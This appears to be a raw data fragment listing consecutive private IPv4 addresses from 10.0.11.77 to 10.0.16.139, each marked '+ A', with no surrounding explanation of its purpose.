10.0.11.77 + A 10.0.11.78 + A 10.0.11.79 + A 10.0.11.80 + A 10.0.11.81 + A 10.0.11.82 + A 10.0.11.83 + A 10.0.11.84 + A 10.0.11.85 + A 10.0.11.86 + A 10.0.11.87 + A 10.0.11.88 + A 10.0.11.89 + A 10.0.11.90 + A 10.0.11.91 + A 10.0.11.92 + A 10.0.11.93 + A 10.0.11.94 + A 10.0.11.95 + A 10.0.11.96 + A 10.0.11.97 + A 10.0.11.98 + A 10.0.11.99 + A 10.0.11.100 + A 10.0.11.101 + A 10.0.11.102 + A 10.0.11.103 + A 10.0.11.104 + A 10.0.11.105 + A 10.0.11.106 + A 10.0.11.107 + A 10.0.11.108 + A 10.0.11.109 + A 10.0.11.110 + A 10.0.11.111 + A 10.0.11.112 + A 10.0.11.113 + A 10.0.11.114 + A 10.0.11.115 + A 10.0.11.116 + A 10.0.11.117 + A 10.0.11.118 + A 10.0.11.119 + A 10.0.11.120 + A 10.0.11.121 + A 10.0.11.122 + A 10.0.11.123 + A 10.0.11.124 + A 10.0.11.125 + A 10.0.11.126 + A 10.0.11.127 + A 10.0.11.128 + A 10.0.11.129 + A 10.0.11.130 + A 10.0.11.131 + A 10.0.11.132 + A 10.0.11.133 + A 10.0.11.134 + A 10.0.11.135 + A 10.0.11.136 + A 10.0.11.137 + A 10.0.11.138 + A 10.0.11.139 + A 
10.0.11.140 + A 10.0.11.141 + A 10.0.11.142 + A 10.0.11.143 + A 10.0.11.144 + A 10.0.11.145 + A 10.0.11.146 + A 10.0.11.147 + A 10.0.11.148 + A 10.0.11.149 + A 10.0.11.150 + A 10.0.11.151 + A 10.0.11.152 + A 10.0.11.153 + A 10.0.11.154 + A 10.0.11.155 + A 10.0.11.156 + A 10.0.11.157 + A 10.0.11.158 + A 10.0.11.159 + A 10.0.11.160 + A 10.0.11.161 + A 10.0.11.162 + A 10.0.11.163 + A 10.0.11.164 + A 10.0.11.165 + A 10.0.11.166 + A 10.0.11.167 + A 10.0.11.168 + A 10.0.11.169 + A 10.0.11.170 + A 10.0.11.171 + A 10.0.11.172 + A 10.0.11.173 + A 10.0.11.174 + A 10.0.11.175 + A 10.0.11.176 + A 10.0.11.177 + A 10.0.11.178 + A 10.0.11.179 + A 10.0.11.180 + A 10.0.11.181 + A 10.0.11.182 + A 10.0.11.183 + A 10.0.11.184 + A 10.0.11.185 + A 10.0.11.186 + A 10.0.11.187 + A 10.0.11.188 + A 10.0.11.189 + A 10.0.11.190 + A 10.0.11.191 + A 10.0.11.192 + A 10.0.11.193 + A 10.0.11.194 + A 10.0.11.195 + A 10.0.11.196 + A 10.0.11.197 + A 10.0.11.198 + A 10.0.11.199 + A 10.0.11.200 + A 10.0.11.201 + A 10.0.11.202 + A 10.0.11.203 + A 10.0.11.204 + A 10.0.11.205 + A 10.0.11.206 + A 10.0.11.207 + A 10.0.11.208 + A 10.0.11.209 + A 10.0.11.210 + A 10.0.11.211 + A 10.0.11.212 + A 10.0.11.213 + A 10.0.11.214 + A 10.0.11.215 + A 10.0.11.216 + A 10.0.11.217 + A 10.0.11.218 + A 10.0.11.219 + A 10.0.11.220 + A 10.0.11.221 + A 10.0.11.222 + A 10.0.11.223 + A 10.0.11.224 + A 10.0.11.225 + A 10.0.11.226 + A 10.0.11.227 + A 10.0.11.228 + A 10.0.11.229 + A 10.0.11.230 + A 10.0.11.231 + A 10.0.11.232 + A 10.0.11.233 + A 10.0.11.234 + A 10.0.11.235 + A 10.0.11.236 + A 10.0.11.237 + A 10.0.11.238 + A 10.0.11.239 + A 10.0.11.240 + A 10.0.11.241 + A 10.0.11.242 + A 10.0.11.243 + A 10.0.11.244 + A 10.0.11.245 + A 10.0.11.246 + A 10.0.11.247 + A 10.0.11.248 + A 10.0.11.249 + A 10.0.11.250 + A 10.0.11.251 + A 10.0.11.252 + A 10.0.11.253 + A 10.0.11.254 + A 10.0.11.255 + A 10.0.12.0 + A 10.0.12.1 + A 10.0.12.2 + A 10.0.12.3 + A 10.0.12.4 + A 10.0.12.5 + A 10.0.12.6 + A 10.0.12.7 + A 10.0.12.8 + A 10.0.12.9 + A 
10.0.12.10 + A 10.0.12.11 + A 10.0.12.12 + A 10.0.12.13 + A 10.0.12.14 + A 10.0.12.15 + A 10.0.12.16 + A 10.0.12.17 + A 10.0.12.18 + A 10.0.12.19 + A 10.0.12.20 + A 10.0.12.21 + A 10.0.12.22 + A 10.0.12.23 + A 10.0.12.24 + A 10.0.12.25 + A 10.0.12.26 + A 10.0.12.27 + A 10.0.12.28 + A 10.0.12.29 + A 10.0.12.30 + A 10.0.12.31 + A 10.0.12.32 + A 10.0.12.33 + A 10.0.12.34 + A 10.0.12.35 + A 10.0.12.36 + A 10.0.12.37 + A 10.0.12.38 + A 10.0.12.39 + A 10.0.12.40 + A 10.0.12.41 + A 10.0.12.42 + A 10.0.12.43 + A 10.0.12.44 + A 10.0.12.45 + A 10.0.12.46 + A 10.0.12.47 + A 10.0.12.48 + A 10.0.12.49 + A 10.0.12.50 + A 10.0.12.51 + A 10.0.12.52 + A 10.0.12.53 + A 10.0.12.54 + A 10.0.12.55 + A 10.0.12.56 + A 10.0.12.57 + A 10.0.12.58 + A 10.0.12.59 + A 10.0.12.60 + A 10.0.12.61 + A 10.0.12.62 + A 10.0.12.63 + A 10.0.12.64 + A 10.0.12.65 + A 10.0.12.66 + A 10.0.12.67 + A 10.0.12.68 + A 10.0.12.69 + A 10.0.12.70 + A 10.0.12.71 + A 10.0.12.72 + A 10.0.12.73 + A 10.0.12.74 + A 10.0.12.75 + A 10.0.12.76 + A 10.0.12.77 + A 10.0.12.78 + A 10.0.12.79 + A 10.0.12.80 + A 10.0.12.81 + A 10.0.12.82 + A 10.0.12.83 + A 10.0.12.84 + A 10.0.12.85 + A 10.0.12.86 + A 10.0.12.87 + A 10.0.12.88 + A 10.0.12.89 + A 10.0.12.90 + A 10.0.12.91 + A 10.0.12.92 + A 10.0.12.93 + A 10.0.12.94 + A 10.0.12.95 + A 10.0.12.96 + A 10.0.12.97 + A 10.0.12.98 + A 10.0.12.99 + A 10.0.12.100 + A 10.0.12.101 + A 10.0.12.102 + A 10.0.12.103 + A 10.0.12.104 + A 10.0.12.105 + A 10.0.12.106 + A 10.0.12.107 + A 10.0.12.108 + A 10.0.12.109 + A 10.0.12.110 + A 10.0.12.111 + A 10.0.12.112 + A 10.0.12.113 + A 10.0.12.114 + A 10.0.12.115 + A 10.0.12.116 + A 10.0.12.117 + A 10.0.12.118 + A 10.0.12.119 + A 10.0.12.120 + A 10.0.12.121 + A 10.0.12.122 + A 10.0.12.123 + A 10.0.12.124 + A 10.0.12.125 + A 10.0.12.126 + A 10.0.12.127 + A 10.0.12.128 + A 10.0.12.129 + A 10.0.12.130 + A 10.0.12.131 + A 10.0.12.132 + A 10.0.12.133 + A 10.0.12.134 + A 10.0.12.135 + A 10.0.12.136 + A 10.0.12.137 + A 10.0.12.138 + A 10.0.12.139 + A 
10.0.12.140 + A 10.0.12.141 + A 10.0.12.142 + A 10.0.12.143 + A 10.0.12.144 + A 10.0.12.145 + A 10.0.12.146 + A 10.0.12.147 + A 10.0.12.148 + A 10.0.12.149 + A 10.0.12.150 + A 10.0.12.151 + A 10.0.12.152 + A 10.0.12.153 + A 10.0.12.154 + A 10.0.12.155 + A 10.0.12.156 + A 10.0.12.157 + A 10.0.12.158 + A 10.0.12.159 + A 10.0.12.160 + A 10.0.12.161 + A 10.0.12.162 + A 10.0.12.163 + A 10.0.12.164 + A 10.0.12.165 + A 10.0.12.166 + A 10.0.12.167 + A 10.0.12.168 + A 10.0.12.169 + A 10.0.12.170 + A 10.0.12.171 + A 10.0.12.172 + A 10.0.12.173 + A 10.0.12.174 + A 10.0.12.175 + A 10.0.12.176 + A 10.0.12.177 + A 10.0.12.178 + A 10.0.12.179 + A 10.0.12.180 + A 10.0.12.181 + A 10.0.12.182 + A 10.0.12.183 + A 10.0.12.184 + A 10.0.12.185 + A 10.0.12.186 + A 10.0.12.187 + A 10.0.12.188 + A 10.0.12.189 + A 10.0.12.190 + A 10.0.12.191 + A 10.0.12.192 + A 10.0.12.193 + A 10.0.12.194 + A 10.0.12.195 + A 10.0.12.196 + A 10.0.12.197 + A 10.0.12.198 + A 10.0.12.199 + A 10.0.12.200 + A 10.0.12.201 + A 10.0.12.202 + A 10.0.12.203 + A 10.0.12.204 + A 10.0.12.205 + A 10.0.12.206 + A 10.0.12.207 + A 10.0.12.208 + A 10.0.12.209 + A 10.0.12.210 + A 10.0.12.211 + A 10.0.12.212 + A 10.0.12.213 + A 10.0.12.214 + A 10.0.12.215 + A 10.0.12.216 + A 10.0.12.217 + A 10.0.12.218 + A 10.0.12.219 + A 10.0.12.220 + A 10.0.12.221 + A 10.0.12.222 + A 10.0.12.223 + A 10.0.12.224 + A 10.0.12.225 + A 10.0.12.226 + A 10.0.12.227 + A 10.0.12.228 + A 10.0.12.229 + A 10.0.12.230 + A 10.0.12.231 + A 10.0.12.232 + A 10.0.12.233 + A 10.0.12.234 + A 10.0.12.235 + A 10.0.12.236 + A 10.0.12.237 + A 10.0.12.238 + A 10.0.12.239 + A 10.0.12.240 + A 10.0.12.241 + A 10.0.12.242 + A 10.0.12.243 + A 10.0.12.244 + A 10.0.12.245 + A 10.0.12.246 + A 10.0.12.247 + A 10.0.12.248 + A 10.0.12.249 + A 10.0.12.250 + A 10.0.12.251 + A 10.0.12.252 + A 10.0.12.253 + A 10.0.12.254 + A 10.0.12.255 + A 10.0.13.0 + A 10.0.13.1 + A 10.0.13.2 + A 10.0.13.3 + A 10.0.13.4 + A 10.0.13.5 + A 10.0.13.6 + A 10.0.13.7 + A 10.0.13.8 + A 10.0.13.9 + A 
10.0.13.10 + A 10.0.13.11 + A 10.0.13.12 + A 10.0.13.13 + A 10.0.13.14 + A 10.0.13.15 + A 10.0.13.16 + A 10.0.13.17 + A 10.0.13.18 + A 10.0.13.19 + A 10.0.13.20 + A 10.0.13.21 + A 10.0.13.22 + A 10.0.13.23 + A 10.0.13.24 + A 10.0.13.25 + A 10.0.13.26 + A 10.0.13.27 + A 10.0.13.28 + A 10.0.13.29 + A 10.0.13.30 + A 10.0.13.31 + A 10.0.13.32 + A 10.0.13.33 + A 10.0.13.34 + A 10.0.13.35 + A 10.0.13.36 + A 10.0.13.37 + A 10.0.13.38 + A 10.0.13.39 + A 10.0.13.40 + A 10.0.13.41 + A 10.0.13.42 + A 10.0.13.43 + A 10.0.13.44 + A 10.0.13.45 + A 10.0.13.46 + A 10.0.13.47 + A 10.0.13.48 + A 10.0.13.49 + A 10.0.13.50 + A 10.0.13.51 + A 10.0.13.52 + A 10.0.13.53 + A 10.0.13.54 + A 10.0.13.55 + A 10.0.13.56 + A 10.0.13.57 + A 10.0.13.58 + A 10.0.13.59 + A 10.0.13.60 + A 10.0.13.61 + A 10.0.13.62 + A 10.0.13.63 + A 10.0.13.64 + A 10.0.13.65 + A 10.0.13.66 + A 10.0.13.67 + A 10.0.13.68 + A 10.0.13.69 + A 10.0.13.70 + A 10.0.13.71 + A 10.0.13.72 + A 10.0.13.73 + A 10.0.13.74 + A 10.0.13.75 + A 10.0.13.76 + A 10.0.13.77 + A 10.0.13.78 + A 10.0.13.79 + A 10.0.13.80 + A 10.0.13.81 + A 10.0.13.82 + A 10.0.13.83 + A 10.0.13.84 + A 10.0.13.85 + A 10.0.13.86 + A 10.0.13.87 + A 10.0.13.88 + A 10.0.13.89 + A 10.0.13.90 + A 10.0.13.91 + A 10.0.13.92 + A 10.0.13.93 + A 10.0.13.94 + A 10.0.13.95 + A 10.0.13.96 + A 10.0.13.97 + A 10.0.13.98 + A 10.0.13.99 + A 10.0.13.100 + A 10.0.13.101 + A 10.0.13.102 + A 10.0.13.103 + A 10.0.13.104 + A 10.0.13.105 + A 10.0.13.106 + A 10.0.13.107 + A 10.0.13.108 + A 10.0.13.109 + A 10.0.13.110 + A 10.0.13.111 + A 10.0.13.112 + A 10.0.13.113 + A 10.0.13.114 + A 10.0.13.115 + A 10.0.13.116 + A 10.0.13.117 + A 10.0.13.118 + A 10.0.13.119 + A 10.0.13.120 + A 10.0.13.121 + A 10.0.13.122 + A 10.0.13.123 + A 10.0.13.124 + A 10.0.13.125 + A 10.0.13.126 + A 10.0.13.127 + A 10.0.13.128 + A 10.0.13.129 + A 10.0.13.130 + A 10.0.13.131 + A 10.0.13.132 + A 10.0.13.133 + A 10.0.13.134 + A 10.0.13.135 + A 10.0.13.136 + A 10.0.13.137 + A 10.0.13.138 + A 10.0.13.139 + A 
10.0.13.140 + A 10.0.13.141 + A 10.0.13.142 + A 10.0.13.143 + A 10.0.13.144 + A 10.0.13.145 + A 10.0.13.146 + A 10.0.13.147 + A 10.0.13.148 + A 10.0.13.149 + A 10.0.13.150 + A 10.0.13.151 + A 10.0.13.152 + A 10.0.13.153 + A 10.0.13.154 + A 10.0.13.155 + A 10.0.13.156 + A 10.0.13.157 + A 10.0.13.158 + A 10.0.13.159 + A 10.0.13.160 + A 10.0.13.161 + A 10.0.13.162 + A 10.0.13.163 + A 10.0.13.164 + A 10.0.13.165 + A 10.0.13.166 + A 10.0.13.167 + A 10.0.13.168 + A 10.0.13.169 + A 10.0.13.170 + A 10.0.13.171 + A 10.0.13.172 + A 10.0.13.173 + A 10.0.13.174 + A 10.0.13.175 + A 10.0.13.176 + A 10.0.13.177 + A 10.0.13.178 + A 10.0.13.179 + A 10.0.13.180 + A 10.0.13.181 + A 10.0.13.182 + A 10.0.13.183 + A 10.0.13.184 + A 10.0.13.185 + A 10.0.13.186 + A 10.0.13.187 + A 10.0.13.188 + A 10.0.13.189 + A 10.0.13.190 + A 10.0.13.191 + A 10.0.13.192 + A 10.0.13.193 + A 10.0.13.194 + A 10.0.13.195 + A 10.0.13.196 + A 10.0.13.197 + A 10.0.13.198 + A 10.0.13.199 + A 10.0.13.200 + A 10.0.13.201 + A 10.0.13.202 + A 10.0.13.203 + A 10.0.13.204 + A 10.0.13.205 + A 10.0.13.206 + A 10.0.13.207 + A 10.0.13.208 + A 10.0.13.209 + A 10.0.13.210 + A 10.0.13.211 + A 10.0.13.212 + A 10.0.13.213 + A 10.0.13.214 + A 10.0.13.215 + A 10.0.13.216 + A 10.0.13.217 + A 10.0.13.218 + A 10.0.13.219 + A 10.0.13.220 + A 10.0.13.221 + A 10.0.13.222 + A 10.0.13.223 + A 10.0.13.224 + A 10.0.13.225 + A 10.0.13.226 + A 10.0.13.227 + A 10.0.13.228 + A 10.0.13.229 + A 10.0.13.230 + A 10.0.13.231 + A 10.0.13.232 + A 10.0.13.233 + A 10.0.13.234 + A 10.0.13.235 + A 10.0.13.236 + A 10.0.13.237 + A 10.0.13.238 + A 10.0.13.239 + A 10.0.13.240 + A 10.0.13.241 + A 10.0.13.242 + A 10.0.13.243 + A 10.0.13.244 + A 10.0.13.245 + A 10.0.13.246 + A 10.0.13.247 + A 10.0.13.248 + A 10.0.13.249 + A 10.0.13.250 + A 10.0.13.251 + A 10.0.13.252 + A 10.0.13.253 + A 10.0.13.254 + A 10.0.13.255 + A 10.0.14.0 + A 10.0.14.1 + A 10.0.14.2 + A 10.0.14.3 + A 10.0.14.4 + A 10.0.14.5 + A 10.0.14.6 + A 10.0.14.7 + A 10.0.14.8 + A 10.0.14.9 + A 
10.0.14.10 + A 10.0.14.11 + A 10.0.14.12 + A 10.0.14.13 + A 10.0.14.14 + A 10.0.14.15 + A 10.0.14.16 + A 10.0.14.17 + A 10.0.14.18 + A 10.0.14.19 + A 10.0.14.20 + A 10.0.14.21 + A 10.0.14.22 + A 10.0.14.23 + A 10.0.14.24 + A 10.0.14.25 + A 10.0.14.26 + A 10.0.14.27 + A 10.0.14.28 + A 10.0.14.29 + A 10.0.14.30 + A 10.0.14.31 + A 10.0.14.32 + A 10.0.14.33 + A 10.0.14.34 + A 10.0.14.35 + A 10.0.14.36 + A 10.0.14.37 + A 10.0.14.38 + A 10.0.14.39 + A 10.0.14.40 + A 10.0.14.41 + A 10.0.14.42 + A 10.0.14.43 + A 10.0.14.44 + A 10.0.14.45 + A 10.0.14.46 + A 10.0.14.47 + A 10.0.14.48 + A 10.0.14.49 + A 10.0.14.50 + A 10.0.14.51 + A 10.0.14.52 + A 10.0.14.53 + A 10.0.14.54 + A 10.0.14.55 + A 10.0.14.56 + A 10.0.14.57 + A 10.0.14.58 + A 10.0.14.59 + A 10.0.14.60 + A 10.0.14.61 + A 10.0.14.62 + A 10.0.14.63 + A 10.0.14.64 + A 10.0.14.65 + A 10.0.14.66 + A 10.0.14.67 + A 10.0.14.68 + A 10.0.14.69 + A 10.0.14.70 + A 10.0.14.71 + A 10.0.14.72 + A 10.0.14.73 + A 10.0.14.74 + A 10.0.14.75 + A 10.0.14.76 + A 10.0.14.77 + A 10.0.14.78 + A 10.0.14.79 + A 10.0.14.80 + A 10.0.14.81 + A 10.0.14.82 + A 10.0.14.83 + A 10.0.14.84 + A 10.0.14.85 + A 10.0.14.86 + A 10.0.14.87 + A 10.0.14.88 + A 10.0.14.89 + A 10.0.14.90 + A 10.0.14.91 + A 10.0.14.92 + A 10.0.14.93 + A 10.0.14.94 + A 10.0.14.95 + A 10.0.14.96 + A 10.0.14.97 + A 10.0.14.98 + A 10.0.14.99 + A 10.0.14.100 + A 10.0.14.101 + A 10.0.14.102 + A 10.0.14.103 + A 10.0.14.104 + A 10.0.14.105 + A 10.0.14.106 + A 10.0.14.107 + A 10.0.14.108 + A 10.0.14.109 + A 10.0.14.110 + A 10.0.14.111 + A 10.0.14.112 + A 10.0.14.113 + A 10.0.14.114 + A 10.0.14.115 + A 10.0.14.116 + A 10.0.14.117 + A 10.0.14.118 + A 10.0.14.119 + A 10.0.14.120 + A 10.0.14.121 + A 10.0.14.122 + A 10.0.14.123 + A 10.0.14.124 + A 10.0.14.125 + A 10.0.14.126 + A 10.0.14.127 + A 10.0.14.128 + A 10.0.14.129 + A 10.0.14.130 + A 10.0.14.131 + A 10.0.14.132 + A 10.0.14.133 + A 10.0.14.134 + A 10.0.14.135 + A 10.0.14.136 + A 10.0.14.137 + A 10.0.14.138 + A 10.0.14.139 + A 
10.0.14.140 + A 10.0.14.141 + A 10.0.14.142 + A 10.0.14.143 + A 10.0.14.144 + A 10.0.14.145 + A 10.0.14.146 + A 10.0.14.147 + A 10.0.14.148 + A 10.0.14.149 + A 10.0.14.150 + A 10.0.14.151 + A 10.0.14.152 + A 10.0.14.153 + A 10.0.14.154 + A 10.0.14.155 + A 10.0.14.156 + A 10.0.14.157 + A 10.0.14.158 + A 10.0.14.159 + A 10.0.14.160 + A 10.0.14.161 + A 10.0.14.162 + A 10.0.14.163 + A 10.0.14.164 + A 10.0.14.165 + A 10.0.14.166 + A 10.0.14.167 + A 10.0.14.168 + A 10.0.14.169 + A 10.0.14.170 + A 10.0.14.171 + A 10.0.14.172 + A 10.0.14.173 + A 10.0.14.174 + A 10.0.14.175 + A 10.0.14.176 + A 10.0.14.177 + A 10.0.14.178 + A 10.0.14.179 + A 10.0.14.180 + A 10.0.14.181 + A 10.0.14.182 + A 10.0.14.183 + A 10.0.14.184 + A 10.0.14.185 + A 10.0.14.186 + A 10.0.14.187 + A 10.0.14.188 + A 10.0.14.189 + A 10.0.14.190 + A 10.0.14.191 + A 10.0.14.192 + A 10.0.14.193 + A 10.0.14.194 + A 10.0.14.195 + A 10.0.14.196 + A 10.0.14.197 + A 10.0.14.198 + A 10.0.14.199 + A 10.0.14.200 + A 10.0.14.201 + A 10.0.14.202 + A 10.0.14.203 + A 10.0.14.204 + A 10.0.14.205 + A 10.0.14.206 + A 10.0.14.207 + A 10.0.14.208 + A 10.0.14.209 + A 10.0.14.210 + A 10.0.14.211 + A 10.0.14.212 + A 10.0.14.213 + A 10.0.14.214 + A 10.0.14.215 + A 10.0.14.216 + A 10.0.14.217 + A 10.0.14.218 + A 10.0.14.219 + A 10.0.14.220 + A 10.0.14.221 + A 10.0.14.222 + A 10.0.14.223 + A 10.0.14.224 + A 10.0.14.225 + A 10.0.14.226 + A 10.0.14.227 + A 10.0.14.228 + A 10.0.14.229 + A 10.0.14.230 + A 10.0.14.231 + A 10.0.14.232 + A 10.0.14.233 + A 10.0.14.234 + A 10.0.14.235 + A 10.0.14.236 + A 10.0.14.237 + A 10.0.14.238 + A 10.0.14.239 + A 10.0.14.240 + A 10.0.14.241 + A 10.0.14.242 + A 10.0.14.243 + A 10.0.14.244 + A 10.0.14.245 + A 10.0.14.246 + A 10.0.14.247 + A 10.0.14.248 + A 10.0.14.249 + A 10.0.14.250 + A 10.0.14.251 + A 10.0.14.252 + A 10.0.14.253 + A 10.0.14.254 + A 10.0.14.255 + A 10.0.15.0 + A 10.0.15.1 + A 10.0.15.2 + A 10.0.15.3 + A 10.0.15.4 + A 10.0.15.5 + A 10.0.15.6 + A 10.0.15.7 + A 10.0.15.8 + A 10.0.15.9 + A 
10.0.15.10 + A 10.0.15.11 + A 10.0.15.12 + A 10.0.15.13 + A 10.0.15.14 + A 10.0.15.15 + A 10.0.15.16 + A 10.0.15.17 + A 10.0.15.18 + A 10.0.15.19 + A 10.0.15.20 + A 10.0.15.21 + A 10.0.15.22 + A 10.0.15.23 + A 10.0.15.24 + A 10.0.15.25 + A 10.0.15.26 + A 10.0.15.27 + A 10.0.15.28 + A 10.0.15.29 + A 10.0.15.30 + A 10.0.15.31 + A 10.0.15.32 + A 10.0.15.33 + A 10.0.15.34 + A 10.0.15.35 + A 10.0.15.36 + A 10.0.15.37 + A 10.0.15.38 + A 10.0.15.39 + A 10.0.15.40 + A 10.0.15.41 + A 10.0.15.42 + A 10.0.15.43 + A 10.0.15.44 + A 10.0.15.45 + A 10.0.15.46 + A 10.0.15.47 + A 10.0.15.48 + A 10.0.15.49 + A 10.0.15.50 + A 10.0.15.51 + A 10.0.15.52 + A 10.0.15.53 + A 10.0.15.54 + A 10.0.15.55 + A 10.0.15.56 + A 10.0.15.57 + A 10.0.15.58 + A 10.0.15.59 + A 10.0.15.60 + A 10.0.15.61 + A 10.0.15.62 + A 10.0.15.63 + A 10.0.15.64 + A 10.0.15.65 + A 10.0.15.66 + A 10.0.15.67 + A 10.0.15.68 + A 10.0.15.69 + A 10.0.15.70 + A 10.0.15.71 + A 10.0.15.72 + A 10.0.15.73 + A 10.0.15.74 + A 10.0.15.75 + A 10.0.15.76 + A 10.0.15.77 + A 10.0.15.78 + A 10.0.15.79 + A 10.0.15.80 + A 10.0.15.81 + A 10.0.15.82 + A 10.0.15.83 + A 10.0.15.84 + A 10.0.15.85 + A 10.0.15.86 + A 10.0.15.87 + A 10.0.15.88 + A 10.0.15.89 + A 10.0.15.90 + A 10.0.15.91 + A 10.0.15.92 + A 10.0.15.93 + A 10.0.15.94 + A 10.0.15.95 + A 10.0.15.96 + A 10.0.15.97 + A 10.0.15.98 + A 10.0.15.99 + A 10.0.15.100 + A 10.0.15.101 + A 10.0.15.102 + A 10.0.15.103 + A 10.0.15.104 + A 10.0.15.105 + A 10.0.15.106 + A 10.0.15.107 + A 10.0.15.108 + A 10.0.15.109 + A 10.0.15.110 + A 10.0.15.111 + A 10.0.15.112 + A 10.0.15.113 + A 10.0.15.114 + A 10.0.15.115 + A 10.0.15.116 + A 10.0.15.117 + A 10.0.15.118 + A 10.0.15.119 + A 10.0.15.120 + A 10.0.15.121 + A 10.0.15.122 + A 10.0.15.123 + A 10.0.15.124 + A 10.0.15.125 + A 10.0.15.126 + A 10.0.15.127 + A 10.0.15.128 + A 10.0.15.129 + A 10.0.15.130 + A 10.0.15.131 + A 10.0.15.132 + A 10.0.15.133 + A 10.0.15.134 + A 10.0.15.135 + A 10.0.15.136 + A 10.0.15.137 + A 10.0.15.138 + A 10.0.15.139 + A 
10.0.15.140 + A 10.0.15.141 + A 10.0.15.142 + A 10.0.15.143 + A 10.0.15.144 + A 10.0.15.145 + A 10.0.15.146 + A 10.0.15.147 + A 10.0.15.148 + A 10.0.15.149 + A 10.0.15.150 + A 10.0.15.151 + A 10.0.15.152 + A 10.0.15.153 + A 10.0.15.154 + A 10.0.15.155 + A 10.0.15.156 + A 10.0.15.157 + A 10.0.15.158 + A 10.0.15.159 + A 10.0.15.160 + A 10.0.15.161 + A 10.0.15.162 + A 10.0.15.163 + A 10.0.15.164 + A 10.0.15.165 + A 10.0.15.166 + A 10.0.15.167 + A 10.0.15.168 + A 10.0.15.169 + A 10.0.15.170 + A 10.0.15.171 + A 10.0.15.172 + A 10.0.15.173 + A 10.0.15.174 + A 10.0.15.175 + A 10.0.15.176 + A 10.0.15.177 + A 10.0.15.178 + A 10.0.15.179 + A 10.0.15.180 + A 10.0.15.181 + A 10.0.15.182 + A 10.0.15.183 + A 10.0.15.184 + A 10.0.15.185 + A 10.0.15.186 + A 10.0.15.187 + A 10.0.15.188 + A 10.0.15.189 + A 10.0.15.190 + A 10.0.15.191 + A 10.0.15.192 + A 10.0.15.193 + A 10.0.15.194 + A 10.0.15.195 + A 10.0.15.196 + A 10.0.15.197 + A 10.0.15.198 + A 10.0.15.199 + A 10.0.15.200 + A 10.0.15.201 + A 10.0.15.202 + A 10.0.15.203 + A 10.0.15.204 + A 10.0.15.205 + A 10.0.15.206 + A 10.0.15.207 + A 10.0.15.208 + A 10.0.15.209 + A 10.0.15.210 + A 10.0.15.211 + A 10.0.15.212 + A 10.0.15.213 + A 10.0.15.214 + A 10.0.15.215 + A 10.0.15.216 + A 10.0.15.217 + A 10.0.15.218 + A 10.0.15.219 + A 10.0.15.220 + A 10.0.15.221 + A 10.0.15.222 + A 10.0.15.223 + A 10.0.15.224 + A 10.0.15.225 + A 10.0.15.226 + A 10.0.15.227 + A 10.0.15.228 + A 10.0.15.229 + A 10.0.15.230 + A 10.0.15.231 + A 10.0.15.232 + A 10.0.15.233 + A 10.0.15.234 + A 10.0.15.235 + A 10.0.15.236 + A 10.0.15.237 + A 10.0.15.238 + A 10.0.15.239 + A 10.0.15.240 + A 10.0.15.241 + A 10.0.15.242 + A 10.0.15.243 + A 10.0.15.244 + A 10.0.15.245 + A 10.0.15.246 + A 10.0.15.247 + A 10.0.15.248 + A 10.0.15.249 + A 10.0.15.250 + A 10.0.15.251 + A 10.0.15.252 + A 10.0.15.253 + A 10.0.15.254 + A 10.0.15.255 + A 10.0.16.0 + A 10.0.16.1 + A 10.0.16.2 + A 10.0.16.3 + A 10.0.16.4 + A 10.0.16.5 + A 10.0.16.6 + A 10.0.16.7 + A 10.0.16.8 + A 10.0.16.9 + A 
10.0.16.10 + A 10.0.16.11 + A 10.0.16.12 + A 10.0.16.13 + A 10.0.16.14 + A 10.0.16.15 + A 10.0.16.16 + A 10.0.16.17 + A 10.0.16.18 + A 10.0.16.19 + A 10.0.16.20 + A 10.0.16.21 + A 10.0.16.22 + A 10.0.16.23 + A 10.0.16.24 + A 10.0.16.25 + A 10.0.16.26 + A 10.0.16.27 + A 10.0.16.28 + A 10.0.16.29 + A 10.0.16.30 + A 10.0.16.31 + A 10.0.16.32 + A 10.0.16.33 + A 10.0.16.34 + A 10.0.16.35 + A 10.0.16.36 + A 10.0.16.37 + A 10.0.16.38 + A 10.0.16.39 + A 10.0.16.40 + A 10.0.16.41 + A 10.0.16.42 + A 10.0.16.43 + A 10.0.16.44 + A 10.0.16.45 + A 10.0.16.46 + A 10.0.16.47 + A 10.0.16.48 + A 10.0.16.49 + A 10.0.16.50 + A 10.0.16.51 + A 10.0.16.52 + A 10.0.16.53 + A 10.0.16.54 + A 10.0.16.55 + A 10.0.16.56 + A 10.0.16.57 + A 10.0.16.58 + A 10.0.16.59 + A 10.0.16.60 + A 10.0.16.61 + A 10.0.16.62 + A 10.0.16.63 + A 10.0.16.64 + A 10.0.16.65 + A 10.0.16.66 + A 10.0.16.67 + A 10.0.16.68 + A 10.0.16.69 + A 10.0.16.70 + A 10.0.16.71 + A 10.0.16.72 + A 10.0.16.73 + A 10.0.16.74 + A 10.0.16.75 + A 10.0.16.76 + A 10.0.16.77 + A 10.0.16.78 + A 10.0.16.79 + A 10.0.16.80 + A 10.0.16.81 + A 10.0.16.82 + A 10.0.16.83 + A 10.0.16.84 + A 10.0.16.85 + A 10.0.16.86 + A 10.0.16.87 + A 10.0.16.88 + A 10.0.16.89 + A 10.0.16.90 + A 10.0.16.91 + A 10.0.16.92 + A 10.0.16.93 + A 10.0.16.94 + A 10.0.16.95 + A 10.0.16.96 + A 10.0.16.97 + A 10.0.16.98 + A 10.0.16.99 + A 10.0.16.100 + A 10.0.16.101 + A 10.0.16.102 + A 10.0.16.103 + A 10.0.16.104 + A 10.0.16.105 + A 10.0.16.106 + A 10.0.16.107 + A 10.0.16.108 + A 10.0.16.109 + A 10.0.16.110 + A 10.0.16.111 + A 10.0.16.112 + A 10.0.16.113 + A 10.0.16.114 + A 10.0.16.115 + A 10.0.16.116 + A 10.0.16.117 + A 10.0.16.118 + A 10.0.16.119 + A 10.0.16.120 + A 10.0.16.121 + A 10.0.16.122 + A 10.0.16.123 + A 10.0.16.124 + A 10.0.16.125 + A 10.0.16.126 + A 10.0.16.127 + A 10.0.16.128 + A 10.0.16.129 + A 10.0.16.130 + A 10.0.16.131 + A 10.0.16.132 + A 10.0.16.133 + A 10.0.16.134 + A 10.0.16.135 + A 10.0.16.136 + A 10.0.16.137 + A 10.0.16.138 + A 10.0.16.139 + A 
